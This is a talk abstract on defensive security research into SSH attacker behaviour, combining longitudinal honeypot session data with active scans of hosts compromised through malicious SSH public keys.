Yogesh Suriyanarayanan: Studying SSH Attacker Behavior via Honeypots and Active Key Scans

This talk connects two measurement perspectives on modern SSH attacks: what attackers do in honeypot sessions and what we can observe via active scans on real hosts over time.

Using ~163 million sessions, in which attackers executed commands in the honeypots, the analysis shows that since early 2023 there is an increasing share of sessions dominated by "scouting" commands compared to sessions that modify the system state. Among the scouting cases, we also provide evidence of large-scale honeypot fingerprinting, for example through logins using default credentials of known honeypots. Finally, the interaction traces repeatedly include attempts to establish SSH-key-based persistence. Overall from the honeypot-based longitudinal study, we can observe a shift in SSH-based attacker behavior towards taking a more exploratory and persistent approach.

Motivated by this repeated appearance of SSH key persistence in the honeypot logs, this work leverages an active measurement dataset containing Nmap scans of hosts containing malicious SSH public keys. The dataset was collected over 8 months (Sep 2024–May 2025) covering 25,000+ compromised hosts and 53 malicious keys (MKs). Using the Nmap scans, we characterize the exposed services on compromised hosts, and by tracking MKs over time we observe patterns that suggest coordination or competition between actors. The understanding of attacker preferences gained from this work has been used to support proactive remediation efforts.

Together, these two perspectives link what attackers do during SSH sessions with what can be observed on Internet-facing hosts over time, giving a more complete view of SSH compromise and key-based persistence.